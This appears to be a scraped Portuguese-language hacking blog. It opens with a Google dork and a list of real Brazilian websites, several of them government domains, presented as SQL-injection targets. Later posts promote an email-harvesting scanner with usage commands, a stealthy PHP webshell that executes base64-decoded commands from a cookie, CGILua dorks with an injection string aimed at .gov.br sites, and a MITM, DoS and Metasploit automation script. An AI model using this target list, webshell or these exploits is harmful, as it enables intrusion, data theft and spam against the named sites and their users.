/DORK: site%3Abr+intext%3A%22warning%3A+mysql_fetch_array%28%29%3B%22+-forum+-vivaolinux+-tutorial+-F%C3%B3rum  /EXPLOIT:  TOTAL VULL:116
 
http://www.cbt.esp.br/modulos/ssl/index.php?indice=128
www.cbt.esp.br/modulos/ssl/index.php?indice=128
www.cbt.esp.br/modulos/ssl/index.php?indice=128
http://www.itdata.com.br/products/index.php?location=product_view&product_area=featured&product_id=4
www.itdata.com.br/products/index.php?location...view...
http://www.epengenharia.com.br/texto-a22-mapa_do_site.html
www.epengenharia.com.br/texto-a22-mapa_do_site.html
http://www.ingesp.com.br/empreendimentos/unifamiliar-em-pinhalzinho-sc/43
www.ingesp.com.br/empreendimentos/unifamiliar-em...sc/43
http://www.dapo.com.br/obra.php?obr
www.dapo.com.br/obra.php?obr
http://www.marcosparente.net.br/?pg=gremio
www.marcosparente.net.br/?pg=gremio
http://www.faa.edu.br/vetmatriz.php
www.faa.edu.br/vetmatriz.php
http://www.softbest.com.br/pwn3ed/spotlights/artspotlight/detalhes-post/9/
www.softbest.com.br/pwn3ed/spotlights/artspotlight/detalhes.../9/
http://www.marciaimoveisrs.com.br/imovel.php?id=7
www.marciaimoveisrs.com.br/imovel.php?id=7
http://www.softbest.com.br/pwn3ed/404/
www.softbest.com.br/pwn3ed/404/
http://www.altogarcas.mt.gov.br/contaspublicas.php?tipo=7
www.altogarcas.mt.gov.br/contaspublicas.php?tipo=7
www.altogarcas.mt.gov.br/contaspublicas.php?tipo=7
www.acainews.com.br/.../b-ecirc-bada-eacute-presa-ap-oacute-s-fazer-sexo-
http://www.cpadnews.com.br/institucional/secao.php?s=3
www.cpadnews.com.br/institucional/secao.php?s=
site%3Abr+intext%3A%22warning%3A+mysql_fetch_array%28%29%3B%22+-forum+-vivaolinux+-tutorial+-F%C3%B3rum  3
http://www.frcsolucoes.com.br/minidir/
www.frcsolucoes.com.br/minidir/
http://www.tuttydecoracoes.com.br/categoria-produtos.php?cat=2..
www.tuttydecoracoes.com.br/categoria-produtos.php?cat=2..
http://www.agricenterseberi.com.br/site/localizacao.php
www.agricenterseberi.com.br/site/localizacao.php
http://clinicacri.com.br/estrutura/enquetes/enquetes.php
http://www.autocentroimoveis.com.br/scherer/imovel.php?id=6051
www.autocentroimoveis.com.br/scherer/imovel.php?id=6051
www.ipm.org.br/ipmb_pagina.php?mpg=2.03.00.00.00...
http://www.eduardoimoveisrs.com.br/imovel.php?id=
www.eduardoimoveisrs.com.br/imovel.php?id=
http://www.cidadefmnavirai.com.br/template_3.php?id=rbatsifxx
www.cidadefmnavirai.com.br/template_3.php?id=rbatsifxx
http://www.cta.br/noticias/noticias.php
www.cta.br/noticias/noticias.php
http://www.makakomotorsports.com.br/?pagina=detalhes&cod=2
www.makakomotorsports.com.br/?pagina=detalhes
http://intranet.clicknet.net.br/modulos/administrativo/local_cobranca/16/index.php
http://www.podiumveiculos.com.br/fire/2014/veiculos-novos.php
www.podiumveiculos.com.br/fire/2014/veiculos-novos.php
http://www.exer.com.br/minidir/
www.exer.com.br/minidir/
http://www.imojel.com.br/include/ler_usina.php
www.imojel.com.br/include/ler_usina.php
http://www.imojel.com.br/include/ler_galeria-montanha.php
www.imojel.com.br/include/ler_galeria-montanha.php
http://www.imobestrela.com.br/imovel.php?id=
www.imobestrela.com.br/imovel.php?id=
http://www.ciadacasaimoveis.com.br/imovel.php?id=14223
www.ciadacasaimoveis.com.br/imovel.php?id=14223
www.saopedrodoparana.pr.gov.br/padrao.php?uid=MjU...
http://www.fiatviaverdi.com.br/semi-novo/fiat-500/42
www.fiatviaverdi.com.br/semi-novo/fiat-500/42
http://www.folhadearaputanga.com.br/index3.php?pg=evento&id=434
www.folhadearaputanga.com.br/index3.php?pg=evento
http://www.feierimoveis.com.br/imovel.php?id=7537
www.feierimoveis.com.br/imovel.php?id=7537
http://www.macrooffice.com.br/novo/animatopo_xml.php
www.macrooffice.com.br/novo/animatopo_xml.php
http://www.marcaprovada.com.br/site/consumidores/codigo.php
www.marcaprovada.com.br/site/consumidores/codigo.php
http://www.ogerente.com.br/novo/canais_colunas_all.php?es=c&canal=9&canallocal=30
http://www.guiadonoroeste.com.br/anuncie.php
www.guiadonoroeste.com.br/anuncie.php
http://marketlist.com.br/minidir/terceiro.php
http://www.bitfarma.com.br/minidir/
www.bitfarma.com.br/minidir/
http://www.tribunavgp.com.br/home/
www.tribunavgp.com.br/home/
http://www.crescer.inf.br/site/?ir=contato
www.crescer.inf.br/site/?ir=contato
http://www.banet.com.br/site/cadastro.php
www.banet.com.br/site/cadastro.php
http://www.praiagrandesp.com.br/exibe.php?id=182
www.praiagrandesp.com.br/exibe.php?id=182
http://www.pampulhamallshopping.com.br/?pg=lojas
www.pampulhamallshopping.com.br/?pg=lojas
www.pampulhamallshopping.com.br/?pg=lojas
http://www.birakimoveis.com.br/links_uteis.php
www.birakimoveis.com.br/links_uteis.php
http://www.autofuria.com.br/paginas/veiculo_info.php?veiculo=1
www.autofuria.com.br/paginas/veiculo_info.php?veiculo=1
http://www.astaritabazacas.com.br/?link=maquinas&produto=7
http://www.grupoacaoimoveis.com.br/index.php
www.grupoacaoimoveis.com.br/index.php
http://www.lincetoyota.com.br/acessorios/?carro_acessorio=%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20mysql_fetch_array
www.lincetoyota.com.br/acessorios/?carro_acessorio...
http://www.negocieimoveisrs.com.br/loja.php?id=711
www.negocieimoveisrs.com.br/loja.php?id=711
www.negocieimoveisrs.com.br/loja.php?id=711
http://www.portalubirata.com.br/guia/Floricultura/66664-Decorart_Floricultura.html
www.portalubirata.com.br/guia/.../66664-Decorart_Floricultura.html
http://www.tudoparasuaempresa.com.br/orcamento.php?codigo=63&
www.tudoparasuaempresa.com.br/orcamento.php?codigo=63
http://www.camarapotim.sp.gov.br/sessoes/indice-ordinarias.php
http://www.mcsmecanica.com.br/index.php
www.mcsmecanica.com.br/index.php
http://imobiliariagaleao.com.br/pesq_refinada/indexformpesqrefinada.php
http://fluirpilates.com.br/equipePessoa.php?id=4
http://imoveissponline.com.br/parceiros.php
http://intranet.vcnet.com.br/modulos/administrativo/local_cobranca/38/index.php
http://www.perfininvestimentos.com.br/fundos/perfin-ls-plus-fic-fim.htm
www.perfininvestimentos.com.br/fundos/perfin-ls-plus-fic-fim.htm
www.tripliceeventos.com.br/tclass/index.php?opt=in
http://www.quibusca.com.br/produto.php?idprod=
www.quibusca.com.br/produto.php?idprod=
http://www.delamarveiculos.com.br/motos_usadas.php
www.delamarveiculos.com.br/motos_usadas.php

quinta-feira, 23 de janeiro de 2014

TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]


INURLMAIL
TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]


Demonstração de uso do scanner a versão que é utilizada neste vídeo é uma beta, mas o link disponível para down já é final de uso.
VÍDEO AULA PART-01
###################################
* SCANNER INURL-MAIL 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* -----------------------------------------------------------------
* BUSCA LISTMAIL
* OBJETIVO USAR O MOTOR DE BUSCA GOOGLE PARA CAPTURAR EMAILS LIST.
* A CADA URL ENCONTRADA PELO BUSCADOR, SERA EFETUADO UM FILTRO      CAPTURANDO OS EMAILS
* CONTIDOS NA URL.
* -----------------------------------------------------------------
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
################################

Tutorial SCANNER INURLMAIL 1.0 PART-01





Comando de uso:
php inurlmail.php  --dork='site:.com.br hotmail ext:txt'  --arquivo='mails.txt'
php inurlmail.php ajuda

Tutorial SCANNER INURLMAIL 1.0 PART-02



Baixar: https://github.com/googleinurl/INURLMAIL

terça-feira, 7 de janeiro de 2014

Webshell via COOKIE


O Script feito em PHP usa COOKIE uma variável global em vez de GET e POST em sua WebShell para ser mais furtivo.
Escrito por Ahmed Shawky @lnxg33k
O código a seguir é uma alternativa para os métodos GET e POST
como ele usa uma variável global _COOKIE.
Deve funcionar da seguinte forma:

system(base64_decode($_COOKIE["1"]));


O código feito em Python, Explora isso abrindo um terminal para execução dos comandos desejados.
Executando:
./cookie.py http://alvo.com.br/cookie.php


Executando: ./cookie.py http://alvo.com.br/cookie.php


#BAIXAR https://github.com/lnxg33k/misc/blob/master/cookie.py

terça-feira, 10 de dezembro de 2013

Usando SNCANNER INURL para achar falhas em aplicações CGILua

Exploitando CGILua
Usando SNCANNER INURL para achar falhas em aplicações CGILua

O CGILua' é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.

EXPLOIT USADO: '0x272D2D3B

DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"


Usando SCANNER INURL para achar possíveis falhas:

TOTAL DE URL's: 75

TOTAL DE POSSÍVEIS VULL: 18

ARQUIVO COM RESULTADO: resultados.txt

http://blog.inurl.com.br/2013/09/cgilua-321-cgi-exploit.html

Scanner INURL:
https://code.google.com/p/scanner-inurl/

quinta-feira, 5 de dezembro de 2013

Liberado 'netool.sh V3.4' (estável)

netool.sh V3.4

---------------------------------------------------------------------------------------------------------
Liberado 'netool.sh V3.4' (estável)
---------------------------------------------------------------------------------------------------------


netool.sh é um script em bash para automatizar frameworks como Nmap , redes de deriva , sslstrip ,
Metasploit e Ettercap MITM ataques . esse script faz com que seja fácil, tarefas como
SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle , SSLsniff , falsificação de DNS , o outro
módulos disponíveis são:

recuperar metadados do site alvo, ataques DoS dentro da rede externa / local ,
também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto
no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters , também como a habilidade de
capturar imagens de navegação na web -browser na máquina de destino sob ataque MITM e
realiza uma varredura vuln ao web-site -alvo usando websecurify firefox- addon , também
usos [ msfpayload + + msfencode msfcli ] para ter o controle remoto da máquina de destino, também
veio com [ root3.rb ] meterpreter ruby script de auxiliar, e um módulo para instalar / editar
o script meterpreter e atualizar o banco de dados Metasploit automática, busca de
alvos de geolocalização, ou use [ webcrawler.py ] módulo para procurar páginas de login de administrador ,
directorys site, webshells.php plantada no site , scanner vulns upload de arquivo comum
[ LFI ] e procurar XSS sites vuln usando (Dorks,Strings) do google , também usa um módulo para
automatizado alguns ataques mais MITM ( dns- paródia + metasploit + phishing, e uma coleção de
( Metasploit ) exploits automatizados.

Ping remote target or web domain
Show Local Connections (see my machine connections)
Show my Ip address and arp cache
see/change macaddress
change my PC hostname
Scan Local network (search for live hosts inside local network)
search in external lan for hosts
Scan remote host (using nmap to perform a scan to target machine)
execute Nmap command (direct from shell)
search for target geo-location
Open router config page
Ip tracer whois (open website database whois and geo-location)
WebCrawler (open websecurify webcrawler website)
DDoS java Script (perform DDoS attacks external network)
Retrieve metadata (from a web-domain)
Config ettercap (etter.conf))
Launch MITM (using ettercap to perform MITM)
show URLs visited (by target machine under MITM)
Sniff remote pics (by target machine under MITM)
sniff SSL-HTTPS logins
share files in local lan
Dns-Spoofing (redirect web-domains to another ip address)
DoS attack (local netwok)
Compile etter.filters
execute ettercap filter
webcrawler
post-exploitation auxiliary modules
r00tsect0r automated exploits
common user password profiler
d. Delete lock folders
a. about netool
q. quit

Vídeo (version 3.4)


---------------------------------------------------------------------------------------------------------
Confira as novidades
http://sourceforge.net/p/netoolsh/wiki/bug-fixes-release/

Confira o WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/

Projeto:
http://sourceforge.net/projects/netoolsh/
---------------------------------------------------------------------------------------------------------

sexta-feira, 29 de novembro de 2013

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL

Repositório oficial do SCANNER INURL.
Scanner INURL utiliza motor de busca Google para achar seus alvos.

O projeto SCANNER INURL com interface web será descontinuado.
Assim dando mais foco ao Scanner em linha de comando.

BUSCA POSSÍVEIS VULNERABILIDADES

SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.

OPÇÕES PARA SETAR PROXY.

MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.

SETAR EXPLOIT.

PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.

GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.

Repositório:
https://code.google.com/p/scanner-inurl/